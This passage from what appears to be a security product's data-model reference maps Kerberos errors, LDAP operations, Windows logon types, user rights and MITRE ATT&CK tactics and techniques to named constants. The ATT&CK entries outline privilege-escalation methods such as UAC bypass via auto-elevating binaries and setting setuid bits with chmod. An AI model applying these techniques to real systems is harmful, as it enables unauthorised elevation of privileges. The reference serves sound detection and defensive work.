19 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_SERVICE_REVOKED Credentials for server have been revoked.

20 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_TGT_REVOKED TGT has been revoked.

21 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_CLIENT_NOTYET Client not yet valid; try again later.

22 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_SERVICE_NOTYET Server not yet valid; try again later.

23 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_KEY_EXPIRED Password has expired; change password to reset.

24 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_PREAUTH_FAILED Pre-authentication information was invalid.

25 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_PREAUTH_REQUIRED Additional pre-authentication required.

26 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_SERVER_NOMATCH Requested server and ticket don't match.

27 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_MUST_USE_USER2USER Server principal valid for user2user only.

28 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_PATH_NOT_ACCEPTED KDC Policy rejects transited path.

29 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_SVC_UNAVAILABLE A service is not available.

31 XDM_CONST.KERBEROS_ERROR_CODE_ERR_AP_BAD_INTEGRITY Integrity check on decrypted field failed.

32 XDM_CONST.KERBEROS_ERROR_CODE_ERR_AP_TKT_EXPIRED Ticket expired.

33 XDM_CONST.KERBEROS_ERROR_CODE_ERR_AP_TKT_NYV Ticket not yet valid.

34 XDM_CONST.KERBEROS_ERROR_CODE_ERR_AP_REPEAT Request is a replay.

35 XDM_CONST.KERBEROS_ERROR_CODE_ERR_AP_NOT_US The ticket isn't for us.

36 XDM_CONST.KERBEROS_ERROR_CODE_ERR_AP_BADMATCH Ticket and authenticator don't match.

37 XDM_CONST.KERBEROS_ERROR_CODE_ERR_AP_SKEW Clock skew too great.

38 XDM_CONST.KERBEROS_ERROR_CODE_ERR_AP_BADADDR Incorrect net address.

39 XDM_CONST.KERBEROS_ERROR_CODE_ERR_AP_BADVERSION Protocol version mismatch.

40 XDM_CONST.KERBEROS_ERROR_CODE_ERR_AP_MSG_TYPE Invalid message type.

41 XDM_CONST.KERBEROS_ERROR_CODE_ERR_AP_MODIFIED Message stream modified.

42 XDM_CONST.KERBEROS_ERROR_CODE_ERR_AP_BADORDER Message out of order.

44 XDM_CONST.KERBEROS_ERROR_CODE_ERR_AP_BADKEYVER Specified version of key is not available.

45 XDM_CONST.KERBEROS_ERROR_CODE_ERR_AP_NOKEY Service key not available.

46 XDM_CONST.KERBEROS_ERROR_CODE_ERR_AP_MUT_FAIL Mutual authentication failed.

47 XDM_CONST.KERBEROS_ERROR_CODE_ERR_AP_BADDIRECTION Incorrect message direction.

48 XDM_CONST.KERBEROS_ERROR_CODE_ERR_AP_METHOD Alternative authentication method required.

49 XDM_CONST.KERBEROS_ERROR_CODE_ERR_AP_BADSEQ Incorrect sequence number in message.

50 XDM_CONST.KERBEROS_ERROR_CODE_ERR_AP_INAPP_CKSUM Inappropriate type of checksum in message.

51 XDM_CONST.KERBEROS_ERROR_CODE_ERR_AP_PATH_NOT_ACCEPTED Policy rejects transited path.

52 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_RESPONSE_TOO_BIG Response too big for UDP; retry with TCP.

60 XDM_CONST.KERBEROS_ERROR_CODE_ERR_GENERIC Generic error (description in e-text).

61 XDM_CONST.KERBEROS_ERROR_CODE_ERR_FIELD_TOOLONG Field is too long for this implementation.

62 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC__CLIENT_NOT_TRUSTED Reserved for PKINIT.

63 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC__KDC_NOT_TRUSTED Reserved for PKINIT.

64 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC__INVALID_SIG Reserved for PKINIT.

65 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_KEY_TOO_WEAK Reserved for PKINIT.

66 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_CERTIFICATE_MISMATCH Reserved for PKINIT.

 Original Mapped Description

67 XDM_CONST.KERBEROS_ERROR_CODE_ERR_AP_NO_TGT No TGT available to validate USER-TO-USER.

68 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_WRONG_REALM Reserved for future use.

69 XDM_CONST.KERBEROS_ERROR_CODE_ERR_AP_USER_TO_USER_REQUIRED Ticket must be for USER-TO-USER.

70 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_CANT_VERIFY_CERTIFICATE Reserved for PKINIT.

71 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_INVALID_CERTIFICATE Reserved for PKINIT.

72 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_REVOKED_CERTIFICATE Reserved for PKINIT.

73 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_REVOCATION_STATUS_UNKNOWN Reserved for PKINIT.

74 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_REVOCATION_STATUS_UNAVAILABLE Reserved for PKINIT.

75 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_CLIENT_NAME_MISMATCH Reserved for PKINIT.

76 XDM_CONST.KERBEROS_ERROR_CODE_ERR_KDC_KDC_NAME_MISMATCH Reserved for PKINIT.

3.21 | XDM_CONST.LDAP_OPERATION
The LDAP operation type.

Original Mapped Description

0 XDM_CONST.LDAP_OPERATION_BIND_REQUEST A request to bind to the LDAP server.

1 XDM_CONST.LDAP_OPERATION_BIND_RESPONSE A response to a bind request.

2 XDM_CONST.LDAP_OPERATION_UNBIND_REQUEST A request to unbind from the LDAP server.

3 XDM_CONST.LDAP_OPERATION_SEARCH_REQUEST A request to search the LDAP directory.

4 XDM_CONST.LDAP_OPERATION_SEARCH_RESULT_ENTRY A search result entry returned in response to a search request.

5 XDM_CONST.LDAP_OPERATION_SEARCH_RESULT_DONE The final result in a search request.

6 XDM_CONST.LDAP_OPERATION_MODIFY_REQUEST A request to modify an LDAP entry.

7 XDM_CONST.LDAP_OPERATION_MODIFY_RESPONSE A response to a modify request.

8 XDM_CONST.LDAP_OPERATION_ADD_REQUEST A request to add an LDAP entry.

9 XDM_CONST.LDAP_OPERATION_ADD_RESPONSE A response to an add request.

10 XDM_CONST.LDAP_OPERATION_DEL_REQUEST A request to delete an LDAP entry.

11 XDM_CONST.LDAP_OPERATION_DEL_RESPONSE A response to a delete request.

12 XDM_CONST.LDAP_OPERATION_MODIFY_DN_REQUEST A request to modify the distinguished name of an LDAP entry.

13 XDM_CONST.LDAP_OPERATION_MODIFY_DN_RESPONSE A response to a modify distinguished name request.

14 XDM_CONST.LDAP_OPERATION_COMPARE_REQUEST A request to compare an LDAP attribute value with an expected value.

15 XDM_CONST.LDAP_OPERATION_COMPARE_RESPONSE A response to a compare request.

16 XDM_CONST.LDAP_OPERATION_ABANDON_REQUEST A request to abandon an LDAP operation.

19 XDM_CONST.LDAP_OPERATION_SEARCH_RESULT_REFERENCE A search result reference returned in response to a search request.

23 XDM_CONST.LDAP_OPERATION_EXTENDED_REQUEST A request to perform an LDAP extended operation.

24 XDM_CONST.LDAP_OPERATION_EXTENDED_RESPONSE A response to an extended request.

3.22 | XDM_CONST.LDAP_SCOPE
The search scope in which this operation is performed.

Original Mapped Description

0 XDM_CONST.LDAP_SCOPE_BASE_OBJECT Searches only the base object.

1 XDM_CONST.LDAP_SCOPE_SINGLE_LEVEL Searches only the immediate children of the base object.

2 XDM_CONST.LDAP_SCOPE_WHOLE_SUBTREE Searches the base object and all of its descendants.

3.23 | XDM_CONST.LDAP_BIND_AUTH_TYPE
The authentication type used for the bind operation.
 Original Mapped Description

0 XDM_CONST.LDAP_BIND_AUTH_TYPE_SIMPLE Uses a simple authentication method, where the client sends the LDAP server a clear-text password.

3 XDM_CONST.LDAP_BIND_AUTH_TYPE_SASL Uses the Simple Authentication and Security Layer (SASL) to authenticate the client.

3.24 | XDM_CONST.LOGON_TYPE
A numeric value that indicates the type of logon session. See https://docs.microsoft.com/en-us/windows/win32/cimwin32prov/win32-logonsession.

Original Mapped Description

2 XDM_CONST.LOGON_TYPE_INTERACTIVE Intended for users who are interactively using the machine, such as a user being logged on by a terminal server, remote shell, or similar process.

3 XDM_CONST.LOGON_TYPE_NETWORK Intended for high-performance servers to authenticate clear text passwords. LogonUser does not cache credentials for this logon type.

4 XDM_CONST.LOGON_TYPE_BATCH Intended for batch servers, where processes can be executed on behalf of a user without their direct intervention; or for higher performance servers that process many clear-text authentication attempts at a time, such as mail or web
servers. LogonUser does not cache credentials for this logon type.

5 XDM_CONST.LOGON_TYPE_SERVICE Indicates a service-type logon. The account provided must have the service privilege enabled.

6 XDM_CONST.LOGON_TYPE_PROXY Indicates a proxy-type logon.

7 XDM_CONST.LOGON_TYPE_UNLOCK This logon type is intended for GINA DLLs logging on users who are interactively using the machine. This logon type allows a unique audit record to be generated that shows when the workstation was unlocked.

8 XDM_CONST.LOGON_TYPE_NETWORK_CLEARTEXT Preserves the name and password in the authentication packages, allowing the server to make connections to other network servers while impersonating the client. This allows a server to accept clear text credentials from a client, call
LogonUser, verify that the user can access the system across the network, and still communicate with other servers.

9 XDM_CONST.LOGON_TYPE_NEW_CREDENTIALS Allows the caller to clone its current token and specify new credentials for outbound connections. The new logon session has the same local identify, but uses different credentials for other network connections.

10 XDM_CONST.LOGON_TYPE_REMOTE_INTERACTIVE Terminal Services session that is both remote and interactive.

11 XDM_CONST.LOGON_TYPE_CACHED_INTERACTIVE Attempt cached credentials without accessing the network.

12 XDM_CONST.LOGON_TYPE_CACHED_REMOTE_INTERACTIVE Same as RemoteInteractive. This is used for internal auditing.

13 XDM_CONST.LOGON_TYPE_CACHED_UNLOCK Workstation logon.

3.25 | XDM_CONST.LOGON_IMPERSONATION_LEVEL
Impersonation is the ability of a thread to execute in a security context that is different from the context of the process that owns the thread. When running in the client's security context, the server 'is' the client, to some degree. See https://docs.microsoft.com/en-us/windows/win32/com/impersonation-levels

Original Mapped Description

% XDM_CONST.LOGON_IMPERSONATION_LEVEL_ANONYMOUS The client is anonymous to the server. The server process can impersonate the client, but the impersonation token does not contain any information about the client. This level is only supported over the local interprocess
%1831 communication transport. All other transports silently promote this level to identify.

% XDM_CONST.LOGON_IMPERSONATION_LEVEL_IDENTIFICATION The system default level. The server can obtain the client's identity, and the server can impersonate the client to do ACL checks.
%1832

% XDM_CONST.LOGON_IMPERSONATION_LEVEL_IMPERSONATION The server can impersonate the client's security context while acting on behalf of the client. The server can access local resources as the client. If the server is local, it can access network resources as the client. If the server is
%1833 remote, it can access only resources that are on the same computer as the server.

% XDM_CONST.LOGON_IMPERSONATION_LEVEL_DELEGATION The most powerful impersonation level. When this level is selected, the server (whether local or remote) can impersonate the client's security context while acting on behalf of the client. During impersonation, the client's credentials
%1840 (both local and network) can be passed to any number of computers.

3.26 | XDM_CONST.LOGON_ASSIGNED_RIGHT
User rights that are assigned in this logon. See https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/user-rights-assignment.

Original Mapped Description

SeTrustedCredManAccessPrivilege XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_TRUSTED_CRED_MAN_ACCESS_PRIVILEGE Access Credential Manager as a trusted caller.

SeNetworkLogonRight XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_NETWORK_LOGON_RIGHT Access this computer from the network.

SeTcbPrivilege XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_TCB_PRIVILEGE Act as part of the operating system.

SeMachineAccountPrivilege XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_MACHINE_ACCOUNT_PRIVILEGE Add workstations to domain.

SeIncreaseQuotaPrivilege XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_INCREASE_QUOTA_PRIVILEGE Adjust memory quotas for a process.

SeInteractiveLogonRight XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_INTERACTIVE_LOGON_RIGHT Allow log on locally.

SeRemoteInteractiveLogonRight XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_REMOTE_INTERACTIVE_LOGON_RIGHT Allow log on through Remote Desktop Services.

SeBackupPrivilege XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_BACKUP_PRIVILEGE Back up files and directories.

SeChangeNotifyPrivilege XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_CHANGE_NOTIFY_PRIVILEGE Bypass traverse checking.

SeSystemtimePrivilege XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_SYSTEMTIME_PRIVILEGE Change the system time.

SeTimeZonePrivilege XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_TIME_ZONE_PRIVILEGE Change the time zone.

SeCreatePagefilePrivilege XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_CREATE_PAGEFILE_PRIVILEGE Create a pagefile.

 Original Mapped Description

SeCreateTokenPrivilege XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_CREATE_TOKEN_PRIVILEGE Create a token object.

SeCreateGlobalPrivilege XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_CREATE_GLOBAL_PRIVILEGE Create global objects.

SeCreatePermanentPrivilege XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_CREATE_PERMANENT_PRIVILEGE Create permanent shared objects.

SeCreateSymbolicLinkPrivilege XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_CREATE_SYMBOLIC_LINK_PRIVILEGE Create symbolic links.

SeDebugPrivilege XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_DEBUG_PRIVILEGE Debug programs.

SeDenyNetworkLogonRight XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_DENY_NETWORK_LOGON_RIGHT Deny access to this computer from the network.

SeDenyBatchLogonRight XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_DENY_BATCH_LOGON_RIGHT Deny log on as a batch job.

SeDenyServiceLogonRight XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_DENY_SERVICE_LOGON_RIGHT Deny log on as a service.

SeDenyInteractiveLogonRight XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_DENY_INTERACTIVE_LOGON_RIGHT Deny log on locally.

SeDenyRemoteInteractiveLogonRight XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_DENY_REMOTE_INTERACTIVE_LOGON_RIGHT Deny log on through Remote Desktop Services.

SeEnableDelegationPrivilege XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_ENABLE_DELEGATION_PRIVILEGE Enable computer and user accounts to be trusted for delegation.

SeRemoteShutdownPrivilege XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_REMOTE_SHUTDOWN_PRIVILEGE Force shutdown from a remote system.

SeAuditPrivilege XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_AUDIT_PRIVILEGE Generate security audits.

SeImpersonatePrivilege XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_IMPERSONATE_PRIVILEGE Impersonate a client after authentication.

SeIncreaseWorkingSetPrivilege XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_INCREASE_WORKING_SET_PRIVILEGE Increase a process working set.

SeIncreaseBasePriorityPrivilege XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_INCREASE_BASE_PRIORITY_PRIVILEGE Increase scheduling priority.

SeLoadDriverPrivilege XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_LOAD_DRIVER_PRIVILEGE Load and unload device drivers.

SeLockMemoryPrivilege XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_LOCK_MEMORY_PRIVILEGE Lock pages in memory.

SeBatchLogonRight XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_BATCH_LOGON_RIGHT Log on as a batch job.

SeServiceLogonRight XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_SERVICE_LOGON_RIGHT Log on as a service.

SeSecurityPrivilege XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_SECURITY_PRIVILEGE Manage auditing and security log.

SeRelabelPrivilege XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_RELABEL_PRIVILEGE Modify an object label.

SeSystemEnvironmentPrivilege XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_SYSTEM_ENVIRONMENT_PRIVILEGE Modify firmware environment values.

SeDelegateSessionUserImpersonatePrivilege XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_DELEGATE_SESSION_USER_IMPERSONATE_PRIVILEGE Obtain an impersonation token for another user in the same session.

SeManageVolumePrivilege XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_MANAGE_VOLUME_PRIVILEGE Perform volume maintenance tasks.

SeProfileSingleProcessPrivilege XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_PROFILE_SINGLE_PROCESS_PRIVILEGE Profile single process.

SeSystemProfilePrivilege XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_SYSTEM_PROFILE_PRIVILEGE Profile system performance.

SeUndockPrivilege XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_UNDOCK_PRIVILEGE Remove computer from docking station.

SeAssignPrimaryTokenPrivilege XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_ASSIGN_PRIMARY_TOKEN_PRIVILEGE Replace a process level token.

SeRestorePrivilege XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_RESTORE_PRIVILEGE Restore files and directories.

SeShutdownPrivilege XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_SHUTDOWN_PRIVILEGE Shut down the system

SeSyncAgentPrivilege XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_SYNC_AGENT_PRIVILEGE Synchronize directory service data.

SeTakeOwnershipPrivilege XDM_CONST.LOGON_ASSIGNED_RIGHT_SE_TAKE_OWNERSHIP_PRIVILEGE Take ownership of files or other objects.

3.27 | XDM_CONST.DB_OPERATION
A canonical operation performed on the database.

Original Mapped Description

QUERY XDM_CONST.DB_OPERATION_QUERY A request to retrieve data from the database.

UPDATE XDM_CONST.DB_OPERATION_UPDATE A request to modify data in the database.

CREATE XDM_CONST.DB_OPERATION_CREATE A request to create a new object in the database.

DELETE XDM_CONST.DB_OPERATION_DELETE A request to delete an object from the database.

ALTER XDM_CONST.DB_OPERATION_ALTER A request to alter the structure of the database, such as adding or removing a column in a table.
3.28 | XDM_CONST.MITRE_TACTIC
Tactics represent the 'why' of an ATT&CK technique or sub-technique. It is the adversary's tactical goal, the reason for performing an action. For example, an adversary may want to achieve credential access.

Original Mapped Description

TA0009 XDM_CONST.MITRE_TACTIC_COLLECTION The adversary is trying to gather data of interest to their goal. Collection consists of techniques adversaries may use to gather information and the sources information is collected from that are relevant to following through on the adversary's
objectives. Frequently, the next goal after collecting data is to steal (exfiltrate) the data. Common target sources include various drive types, browsers, audio, video, and email. Common collection methods include capturing screenshots and
keyboard input. https://attack.mitre.org/tactics/TA0009

TA0011 XDM_CONST.MITRE_TACTIC_COMMAND_AND_CONTROL The adversary is trying to communicate with compromised systems to control them. Command and Control consists of techniques that adversaries may use to communicate with systems under their control within a victim network. Adversaries
commonly attempt to mimic normal, expected traffic to avoid detection. There are many ways an adversary can establish command and control with various levels of stealth depending on the victim’s network structure and defenses. https://
attack.mitre.org/tactics/TA0011

TA0006 XDM_CONST.MITRE_TACTIC_CREDENTIAL_ACCESS The adversary is trying to steal account names and passwords. Credential Access consists of techniques for stealing credentials like account names and passwords. Techniques used to get credentials include keylogging or credential
dumping. Using legitimate credentials can give adversaries access to systems, make them harder to detect, and provide the opportunity to create more accounts to help achieve their goals. https://attack.mitre.org/tactics/TA0006

TA0005 XDM_CONST.MITRE_TACTIC_DEFENSE_EVASION The adversary is trying to avoid being detected. Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security
software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added
benefit of subverting defenses. https://attack.mitre.org/tactics/TA0005

TA0007 XDM_CONST.MITRE_TACTIC_DISCOVERY The adversary is trying to figure out your environment. Discovery consists of techniques an adversary may use to gain knowledge about the system and internal network. These techniques help adversaries observe the environment and orient
themselves before deciding how to act. They also allow adversaries to explore what they can control and what’s around their entry point in order to discover how it could benefit their current objective. Native operating system tools are often
used toward this post-compromise information-gathering objective. https://attack.mitre.org/tactics/TA0007

TA0002 XDM_CONST.MITRE_TACTIC_EXECUTION The adversary is trying to run malicious code. Execution consists of techniques that result in adversary-controlled code running on a local or remote system. Techniques that run malicious code are often paired with techniques from all other
tactics to achieve broader goals, like exploring a network or stealing data. For example, an adversary might use a remote access tool to run a PowerShell script that does Remote System Discovery. https://attack.mitre.org/tactics/TA0002

TA0010 XDM_CONST.MITRE_TACTIC_EXFILTRATION The adversary is trying to steal data. Exfiltration consists of techniques that adversaries may use to steal data from your network. Once they’ve collected data, adversaries often package it to avoid detection while removing it. This can include
compression and encryption. Techniques for getting data out of a target network typically include transferring it over their command and control channel or an alternate channel and may also include putting size limits on the transmission.
https://attack.mitre.org/tactics/TA0010

TA0040 XDM_CONST.MITRE_TACTIC_IMPACT The adversary is trying to manipulate, interrupt, or destroy your systems and data. Impact consists of techniques that adversaries use to disrupt availability or compromise integrity by manipulating business and operational processes.
Techniques used for impact can include destroying or tampering with data. In some cases, business processes can look fine, but may have been altered to benefit the adversaries’ goals. These techniques might be used by adversaries to
follow through on their end goal or to provide cover for a confidentiality breach. https://attack.mitre.org/tactics/TA0040

TA0001 XDM_CONST.MITRE_TACTIC_INITIAL_ACCESS The adversary is trying to get into your network. Initial Access consists of techniques that use various entry vectors to gain their initial foothold within a network. Techniques used to gain a foothold include targeted spearphishing and exploiting
weaknesses on public-facing web servers. Footholds gained through initial access may allow for continued access, like valid accounts and use of external remote services, or may be limited-use due to changing passwords. https://
attack.mitre.org/tactics/TA0001

TA0008 XDM_CONST.MITRE_TACTIC_LATERAL_MOVEMENT The adversary is trying to move through your environment. Lateral Movement consists of techniques that adversaries use to enter and control remote systems on a network. Following through on their primary objective often requires exploring
the network to find their target and subsequently gaining access to it. Reaching their objective often involves pivoting through multiple systems and accounts to gain. Adversaries might install their own remote access tools to accomplish
Lateral Movement or use legitimate credentials with native network and operating system tools, which may be stealthier. https://attack.mitre.org/tactics/TA0008

TA0003 XDM_CONST.MITRE_TACTIC_PERSISTENCE The adversary is trying to maintain their foothold. Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access. Techniques used
for persistence include any access, action, or configuration changes that let them maintain their foothold on systems, such as replacing or hijacking legitimate code or adding startup code. https://attack.mitre.org/tactics/TA0003

TA0004 XDM_CONST.MITRE_TACTIC_PRIVILEGE_ESCALATION The adversary is trying to gain higher-level permissions. Privilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with
unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access include: *
SYSTEM/root level * local administrator * user account with admin-like access * user accounts with access to specific system or perform specific function These techniques often overlap with Persistence techniques, as OS features that let an
adversary persist can execute in an elevated context. https://attack.mitre.org/tactics/TA0004

TA0043 XDM_CONST.MITRE_TACTIC_RECONNAISSANCE The adversary is trying to gather information they can use to plan future operations. Reconnaissance consists of techniques that involve adversaries actively or passively gathering information that can be used to support targeting. Such
information may include details of the victim organization, infrastructure, or staff/personnel. This information can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as using gathered information to plan and
execute Initial Access, to scope and prioritize post-compromise objectives, or to drive and lead further Reconnaissance efforts. https://attack.mitre.org/tactics/TA0043

TA0042 XDM_CONST.MITRE_TACTIC_RESOURCE_DEVELOPMENT The adversary is trying to establish resources they can use to support operations. Resource Development consists of techniques that involve adversaries creating, purchasing, or compromising/stealing resources that can be used to support
targeting. Such resources include infrastructure, accounts, or capabilities. These resources can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as using purchased domains to support Command and
Control, email accounts for phishing as a part of Initial Access, or stealing code signing certificates to help with Defense Evasion. https://attack.mitre.org/tactics/TA0042

3.29 | XDM_CONST.MITRE_TECHNIQUE
Techniques represent 'how' an adversary achieves a tactical goal by performing an action.For example, an adversary may dump credentials to achieve credential access.

Original Mapped Description

T1548 XDM_CONST.MITRE_TECHNIQUE_ABUSE_ELEVATION_CONTROL_MECHANISM Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level
permissions. Most modern systems contain native elevation control mechanisms that are intended to limit
privileges that a user can perform on a machine. Authorization has to be granted to specific users in order
to perform tasks that can be considered of higher risk. An adversary can perform several methods to take
advantage of built-in control mechanisms in order to escalate privileges on a system. https://
attack.mitre.org/techniques/T1548

T1548.002 XDM_CONST.MITRE_TECHNIQUE_ABUSE_ELEVATION_CONTROL_MECHANISM_BYPASS_USER_ACCOUNT_CONTROL Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User
Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from
low to high) to perform a task under administrator-level permissions, possibly by prompting the user for
confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing
the user to perform the action if they are in the local administrators group and click through the prompt or
allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC
Works) If the UAC protection level of a computer is set to anything but the highest level, certain Windows
programs can elevate privileges or execute some elevated [Component Object Model](https://
attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification
box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of
[Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an
auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and
performs a file operation in a protected directory which would typically require elevated access. Malicious
software may also be injected into a trusted process to gain elevated privileges without prompting a user.
(Citation: Davidson Windows) Many methods have been discovered to bypass UAC. The Github readme
page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered
and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are
regularly discovered and some used in the wild, such as: * eventvwr.exe can auto-elevate and execute a
specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit) Another
bypass is possible through some lateral movement techniques if credentials for an account with
administrator privileges are known, since UAC is a single system security mechanism, and the privilege or
integrity of a process running on one system will be unknown on remote systems and default to high
integrity.(Citation: SANS UAC Bypass) https://attack.mitre.org/techniques/T1548/002
Original Mapped Description

T1548.004 XDM_CONST.MITRE_TECHNIQUE_ABUSE_ELEVATION_CONTROL_MECHANISM_ELEVATED_EXECUTION_WITH_PROMPT Adversaries may leverage the AuthorizationExecuteWithPrivileges API to escalate privileges by
prompting the user for credentials.(Citation: AppleDocs AuthorizationExecuteWithPrivileges) The purpose
of this API is to give application developers an easy way to perform operations with root privileges, such as
for application installation or updating. This API does not validate that the program requesting root
privileges comes from a reputable source or has been maliciously modified. Although this API is
deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be
prompted to enter their credentials but no checks on the origin or integrity of the program are made. The
program calling the API may also load world writable files which can be modified to perform malicious
behavior with elevated privileges. Adversaries may abuse AuthorizationExecuteWithPrivileges to
obtain root privileges in order to install malicious software on victims and install persistence mechanisms.
(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019)(Citation: OSX
Coldroot RAT) This technique may be combined with [Masquerading](https://attack.mitre.org/techniques/
T1036) to trick the user into granting escalated privileges to malicious code.(Citation: Death by 1000
installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019) This technique has also been shown to
work by modifying legitimate programs present on the machine that make use of this API.(Citation: Death
by 1000 installers; it's all broken!) https://attack.mitre.org/techniques/T1548/004

T1548.001 XDM_CONST.MITRE_TECHNIQUE_ABUSE_ELEVATION_CONTROL_MECHANISM_SETUID_AND_SETGID An adversary may perform shell escapes or exploit vulnerabilities in an application with the setsuid or setgid
bits to get code running in a different user’s context. On Linux or macOS, when the setuid or setgid bits are
set for an application, the application will run with the privileges of the owning user or group respectively.
(Citation: setuid man page). Normally an application is run in the current user’s context, regardless of which
user or group owns the application. However, there are instances where programs need to be executed in
an elevated context to function properly, but the user running them doesn’t need the elevated privileges.
Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid
or setgid flag to be set for their own applications. These bits are indicated with an "s" instead of an "x" when
viewing a file's attributes via ls -l. The chmod program can set these bits with via bitmasking, chmod 4777
[file] or via shorthand naming, chmod u+s [file]. Adversaries can use this mechanism on their own
malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap
malware). https://attack.mitre.org/techniques/T1548/001

T1548.003 XDM_CONST.MITRE_TECHNIQUE_ABUSE_ELEVATION_CONTROL_MECHANISM_SUDO_AND_SUDO_CACHING Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may
do this to execute commands as other users or spawn processes with higher privileges. Within Linux and
MacOS systems, sudo (sometimes referred to as "superuser do") allows users to perform commands from
